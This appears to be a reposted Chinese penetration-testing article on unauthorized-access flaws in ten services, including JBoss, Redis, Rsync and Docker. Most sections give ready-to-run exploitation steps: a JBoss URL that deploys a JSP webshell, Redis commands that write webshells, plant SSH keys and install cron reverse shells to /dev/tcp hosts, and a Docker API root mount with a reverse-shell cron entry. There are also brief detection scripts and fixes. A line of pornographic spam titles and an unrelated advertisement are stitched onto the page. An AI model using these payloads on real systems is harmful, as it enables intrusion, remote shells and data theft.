日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

本文轉(zhuǎn)載自微信公眾號(hào)「Bypass」，作者Bypass 。轉(zhuǎn)載本文請(qǐng)聯(lián)系Bypass公眾號(hào)。

我們提供的服務(wù)有：成都網(wǎng)站設(shè)計(jì)、網(wǎng)站建設(shè)、微信公眾號(hào)開(kāi)發(fā)、網(wǎng)站優(yōu)化、網(wǎng)站認(rèn)證、城中ssl等。為超過(guò)千家企事業(yè)單位解決了網(wǎng)站和推廣的問(wèn)題。提供周到的售前咨詢(xún)和貼心的售后服務(wù)，是有科學(xué)管理、有技術(shù)的城中網(wǎng)站制作公司

本文詳細(xì)地介紹了常見(jiàn)未授權(quán)訪問(wèn)漏洞及其利用，具體漏洞列表如下：

• Jboss 未授權(quán)訪問(wèn)
• Jenkins 未授權(quán)訪問(wèn)
• ldap未授權(quán)訪問(wèn)
• Redis未授權(quán)訪問(wèn)
• elasticsearch未授權(quán)訪問(wèn)
• MenCache未授權(quán)訪問(wèn)
• Mongodb未授權(quán)訪問(wèn)
• Rsync未授權(quán)訪問(wèn)
• Zookeeper未授權(quán)訪問(wèn)
• Docker未授權(quán)訪問(wèn)

1、Jboss未授權(quán)訪問(wèn)

漏洞原因：

在低版本中，默認(rèn)可以訪問(wèn)Jboss web控制臺(tái)(http://127.0.0.1:8080/jmx-console)，無(wú)需用戶(hù)名和密碼。

漏洞利用：

1、寫(xiě)入一句話(huà)木馬：

 
 
 
 

  
  
  
  
http://127.0.0.1:8080/jmx-console//HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True
 
 
 
 

2、寫(xiě)入1.txt文件

 
 
 
 

  
  
  
  
http://127.0.0.1:8080/August/shell.jsp?f=1.txt&t=hello world!
 
 
 
 

3、訪問(wèn)1.txt文件

 
 
 
 

  
  
  
  
http://127.0.0.1:8080/August/1.txt
 
 
 
 

檢測(cè)工具：jexboss，一個(gè)使用Python編寫(xiě)的Jboss漏洞檢測(cè)利用工具，通過(guò)它可以檢測(cè)并利用web-console，jmx-console，JMXInvokerServlet這三個(gè)漏洞，并且可以獲得一個(gè)shell。

修復(fù)建議：關(guān)閉jmx-console和web-console，提高安全性。

2、Jenkins 未授權(quán)訪問(wèn)

漏洞原因：未設(shè)置密碼，導(dǎo)致未授權(quán)訪問(wèn)。

漏洞測(cè)試：直接通過(guò)url訪問(wèn)

 
 
 
 

  
  
  
  
http://:8080/manage
  
  
  
  
http://:8080/script
 
 
 
 

修復(fù)建議：設(shè)置強(qiáng)口令密碼。

3、ldap未授權(quán)訪問(wèn)

漏洞原因：沒(méi)有對(duì)Ldap進(jìn)行密碼驗(yàn)證，導(dǎo)致未授權(quán)訪問(wèn)。

檢測(cè)腳本：

 
 
 
 

  
  
  
  
#! /usr/bin/env python
  
  
  
  
# _*_  coding:utf-8 _*_
  
  
  
  

  
  
  
  
from ldap3 import Connection,Server,ALL
  
  
  
  
def ldap_anonymous(ip):
  
  
  
  
    try:
  
  
  
  
        server = Server(ip,get_info=ALL,connect_timeout=1)
  
  
  
  
        conn = Connection(server, auto_bind=True)
  
  
  
  
        print "[+] ldap login for anonymous"
  
  
  
  
        conn.closed
  
  
  
  
    except:
  
  
  
  
        #pass
  
  
  
  
        print '[-] checking for ldap anonymous fail'
 
 
 
 

利用工具：使用LdapBrowser直接連入，獲取敏感信息。

修復(fù)建議：增加強(qiáng)密碼驗(yàn)證。

4、Redis未授權(quán)訪問(wèn)

漏洞利用：

姿勢(shì)一：絕對(duì)路徑寫(xiě)webshell

我們可以將dir設(shè)置為一個(gè)目錄a，而dbfilename為文件名b，再執(zhí)行save或bgsave，則我們就可以寫(xiě)入一個(gè)路徑為a/b的任意文件：

 
 
 
 

  
  
  
  
config set dir /home/wwwroot/default/
  
  
  
  
config set dbfilename redis.php
  
  
  
  
set webshell ""
  
  
  
  
save
 
 
 
 

姿勢(shì)二：公私鑰認(rèn)證獲取root權(quán)限

1、ssh免密碼配置

 
 
 
 

  
  
  
  
ssh-keygen -t rsa -P ''     #生成公鑰/私鑰對(duì)                           
  
  
  
  
cd /root/.ssh/
  
  
  
  
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt  #將公鑰寫(xiě)入 foo.txt 文件
  
  
  
  
連接 Redis 寫(xiě)入文件
 
 
 
 

2、連接Redis寫(xiě)入文件

 
 
 
 

  
  
  
  
cat foo.txt | ./redis-cli -h 192.168.125.140  -x set crackit
  
  
  
  
./redis-cli -h 192.168.125.140
  
  
  
  
config set dir /root/.ssh/
  
  
  
  
config get dir
  
  
  
  
config set dbfilename "authorized_keys"
  
  
  
  
save
 
 
 
 

利用私鑰成功登錄redis服務(wù)器

姿勢(shì)三：利用contrab計(jì)劃任務(wù)反彈shell

 
 
 
 

  
  
  
  
config set dir /var/spool/cron/crontabs/
  
  
  
  
config set dbfilename root
  
  
  
  
flushall
  
  
  
  
set test "* * * * * /bin/bash -i >& /dev/tcp/10.1.1.211:1234 0>&1"
  
  
  
  
save
 
 
 
 

姿勢(shì)四：主從復(fù)制RCE

在Reids 4.x之后，Redis新增了模塊功能，通過(guò)外部拓展，可以實(shí)現(xiàn)在Redis中實(shí)現(xiàn)一個(gè)新的Redis命令，通過(guò)寫(xiě)C語(yǔ)言編譯并加載惡意的.so文件，達(dá)到代碼執(zhí)行的目的。

通過(guò)腳本實(shí)現(xiàn)一鍵自動(dòng)化getshell：

1、生成惡意.so文件，下載RedisModules-ExecuteCommand使用make編譯即可生成。

 
 
 
 

  
  
  
  
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
  
  
  
  
cd RedisModules-ExecuteCommand/
  
  
  
  
make
 
 
 
 

2、攻擊端執(zhí)行：python redis-rce.py -r 目標(biāo)ip-p 目標(biāo)端口 -L 本地ip -f 惡意.so

 
 
 
 

  
  
  
  
git clone https://github.com/Ridter/redis-rce.git
  
  
  
  
cd redis-rce/
  
  
  
  
cp ../RedisModules-ExecuteCommand/src/module.so ./
  
  
  
  
pip install -r requirements.txt 
  
  
  
  
python redis-rce.py -r 192.168.28.152 -p 6379 -L 192.168.28.137 -f module.so
 
 
 
 

5、Elasticsearch未授權(quán)訪問(wèn)

漏洞原因：Elasticsearch 默認(rèn)端口為9200 ，攻擊者可以直接訪問(wèn)http://ip:port。

檢測(cè)腳本：

 
 
 
 

  
  
  
  
#! /usr/bin/env python
  
  
  
  
# _*_  coding:utf-8 _*_
  
  
  
  

  
  
  
  
import requests
  
  
  
  
def Elasticsearch_check(ip, port=9200, timeout=5):
  
  
  
  
    try:
  
  
  
  
    　　url = "http://"+ip+":"+str(port)+"/_cat"
  
  
  
  
    　　response = requests.get(url) 
  
  
  
  
    except:
  
  
  
  
    　　pass
  
  
  
  
    if "/_cat/master" in response.content:
  
  
  
  
    　　print '[+] Elasticsearch Unauthorized: ' +ip+':'+str(port)
 
 
 
 

漏洞測(cè)試：

 
 
 
 

  
  
  
  
http://localhost:9200/_cat/indices
  
  
  
  
http://localhost:9200/_river/_search 查看數(shù)據(jù)庫(kù)敏感信息
  
  
  
  
http://localhost:9200/_nodes 查看節(jié)點(diǎn)數(shù)據(jù)
  
  
  
  

  
  
  
  
如有安裝head插件：
  
  
  
  
http://localhost:9200/_plugin/head/ web管理界面
 
 
 
 

修復(fù)建議：

1、限制IP訪問(wèn)，綁定固定IP

2、在config/elasticsearch.yml中為9200端口設(shè)置認(rèn)證：

 
 
 
 

  
  
  
  
http.basic.enabled true #開(kāi)關(guān)，開(kāi)啟會(huì)接管全部HTTP連接
  
  
  
  
　　http.basic.user "admin" #賬號(hào)
  
  
  
  
　　http.basic.password "admin_pw" #密碼
  
  
  
  
　　http.basic.ipwhitelist ["localhost", "127.0.0.1"]
 
 
 
 

6、MenCache未授權(quán)訪問(wèn)

漏洞原因：Memcached 分布式緩存系統(tǒng)，默認(rèn)的 11211 端口不需要密碼即可訪問(wèn)，黑客直接訪問(wèn)即可獲取數(shù)據(jù)庫(kù)中所有信息，造成嚴(yán)重的信息泄露。

檢測(cè)腳本：

 
 
 
 

  
  
  
  
#! /usr/bin/env python
  
  
  
  
# _*_  coding:utf-8 _*_
  
  
  
  
def Memcache_check(ip, port=11211, timeout=5):
  
  
  
  
    try:
  
  
  
  
        socket.setdefaulttimeout(timeout)
  
  
  
  
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  
  
  
  
        s.connect((ip, int(port)))
  
  
  
  
        s.send("stats\r\n")
  
  
  
  
        result = s.recv(1024)
  
  
  
  
        if "STAT version" in result:
  
  
  
  
            print '[+] Memcache Unauthorized: ' +ip+':'+str(port)
  
  
  
  
    except Exception, e:
  
  
  
  
        pass
 
 
 
 

漏洞驗(yàn)證：

 
 
 
 

  
  
  
  
#無(wú)需用戶(hù)名密碼，可以直接連接memcache 服務(wù)的11211端口。
  
  
  
  
telnet x.x.x.x  11211
  
  
  
  

  
  
  
  
stats  //查看memcache 服務(wù)狀態(tài)
  
  
  
  
stats items  //查看所有items
  
  
  
  
stats cachedump 32 0  //獲得緩存key
  
  
  
  
get :state:264861539228401373:261588   //通過(guò)key讀取相應(yīng)value ，獲得實(shí)際緩存內(nèi)容，造成敏感信息泄露
 
 
 
 

修復(fù)建議：綁定的ip地址為 127.0.0.1，或者通過(guò)firewall限制訪問(wèn)。

7、Mongodb未授權(quán)訪問(wèn)

漏洞原因：MongoDB 默認(rèn)是沒(méi)有權(quán)限驗(yàn)證的，登錄的用戶(hù)可以通過(guò)默認(rèn)端口無(wú)需密碼對(duì)數(shù)據(jù)庫(kù)任意操作(增刪改高危動(dòng)作)，而且可以遠(yuǎn)程訪問(wèn)數(shù)據(jù)庫(kù)。

檢測(cè)腳本：

 
 
 
 

  
  
  
  
#! /usr/bin/env python
  
  
  
  
# _*_  coding:utf-8 _*_
  
  
  
  

  
  
  
  
def mongodb(ip,port):    
  
  
  
  
    try:
  
  
  
  
        client = MongoClient(ip,port)
  
  
  
  
        db=client.local
  
  
  
  
        flag = db.collection_names()
  
  
  
  
        if flag:    
  
  
  
  
            print "[+] Mongodb login for anonymous"
  
  
  
  
    except Exception, e:
  
  
  
  
        pass
 
 
 
 

修復(fù)建議：增加用戶(hù)密碼權(quán)限驗(yàn)證，設(shè)置本地監(jiān)聽(tīng)或者訪問(wèn)控制。

8、Rsync未授權(quán)訪問(wèn)

漏洞原因：未配置賬號(hào)密碼認(rèn)證，導(dǎo)致未授權(quán)訪問(wèn)。

漏洞測(cè)試：

 
 
 
 

  
  
  
  
列舉整個(gè)同步目錄或指定目錄：
  
  
  
  
rsync 10.0.0.12 ::
  
  
  
  
rsync 10.0.0.12 :: www /
  
  
  
  

  
  
  
  
下載文件或目錄到本地：
  
  
  
  
rsync – avz 10.0.0.12 :: WWW/  /var/tmp
  
  
  
  
rsync – avz 10.0.0.12 :: www/  /var/tmp
  
  
  
  

  
  
  
  
上傳本地文件到服務(wù)端：
  
  
  
  
rsync -avz webshell 10.0.0.12 :: WWW /
 
 
 
 

修復(fù)建議：增加用戶(hù)密碼認(rèn)證，設(shè)置訪問(wèn)ip限制。

9、Zookeeper未授權(quán)訪問(wèn)

漏洞原因：ZooKeeper默認(rèn)開(kāi)啟在2181端口，在未進(jìn)行任何訪問(wèn)控制情況下，攻擊者可通過(guò)執(zhí)行envi命令獲得系統(tǒng)大量的敏感信息，包括系統(tǒng)名稱(chēng)、Java環(huán)境。

漏洞測(cè)試：

 
 
 
 

  
  
  
  
echo envi|nc 192.168.15.74 2181
 
 
 
 

修復(fù)建議：添加用戶(hù)名密碼認(rèn)證，設(shè)置ip訪問(wèn)控制。

10、Docker未授權(quán)訪問(wèn)

漏洞原因：docker remote api可以執(zhí)行docker命令，docker守護(hù)進(jìn)程監(jiān)聽(tīng)在0.0.0.0，可直接調(diào)用API來(lái)操作docker。

 
 
 
 

  
  
  
  
sudo dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375
 
 
 
 

漏洞利用：

通過(guò)docker daemon api 執(zhí)行docker命令。

 
 
 
 

  
  
  
  
#列出容器信息，效果與docker ps一致。
  
  
  
  
curl http://:2375/containers/json
  
  
  
  

  
  
  
  
#啟動(dòng)容器
  
  
  
  
docker -H tcp://:2375 ps -a
 
 
 
 

1、新運(yùn)行一個(gè)容器，掛載點(diǎn)設(shè)置為服務(wù)器的根目錄掛載至/mnt目錄下。

 
 
 
 

  
  
  
  
sudo docker -H tcp://10.1.1.211:2375 run -it -v /:/mnt nginx:latest /bin/bash
 
 
 
 

2、在容器內(nèi)執(zhí)行命令，將反彈shell的腳本寫(xiě)入到/var/spool/cron/root

 
 
 
 

  
  
  
  
echo '* * * * * /bin/bash -i >& /dev/tcp/10.1.1.214/12345 0>&1' >> /mnt/var/spool/cron/crontabs/root
 
 
 
 

3、本地監(jiān)聽(tīng)端口，獲取對(duì)方宿主機(jī)shell。

網(wǎng)站標(biāo)題：聊聊常見(jiàn)未授權(quán)訪問(wèn)漏洞總結(jié)
當(dāng)前地址：http://www.5511xx.com/article/cohhjds.html